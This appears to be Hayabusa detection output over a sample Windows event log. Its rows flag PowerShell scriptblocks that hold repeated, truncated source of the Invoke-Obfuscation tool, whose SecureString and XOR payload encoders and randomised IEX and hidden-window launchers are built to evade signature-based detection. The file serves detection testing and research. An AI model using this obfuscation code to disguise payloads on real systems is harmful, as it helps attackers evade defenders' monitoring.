# Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. 
# You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. 
.PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('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' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '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' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. 
$LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' 
,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' 
$ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. 
$NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. 
# Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. 
$InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. 
$CommandlineOptions = New-Object String[](0) If($PSBou",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,high,Exec,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/posh_ps_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"ndParameters['NoExit']) { $FullArgument = ""-NoExit""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoProfile']) { $FullArgument = ""-NoProfile""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NonInteractive']) { $FullArgument = ""-NonInteractive""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 5 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['NoLogo']) { $FullArgument = ""-NoLogo""; $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 4 -Maximum ($FullArgument.Length+1))) } If($PSBoundParameters['WindowStyle'] -OR $WindowsStyle) { $FullArgument = ""-WindowStyle"" If($WindowsStyle) {$ArgumentValue = $WindowsStyle} Else {$ArgumentValue = $PSBoundParameters['WindowStyle']} # Randomly decide to write WindowStyle value with flag substring or integer value. 
Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.271 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.276 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedBXORCommand { <# .SYNOPSIS Generates BXOR (bitwise XOR) encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedBXORCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedBXORCommand encodes an input PowerShell scriptblock or path as an bitwise XOR'd payload. It randomly chooses between .Split/-Split/array syntax to store the encoded payload in the final output. 
The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedBXORCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
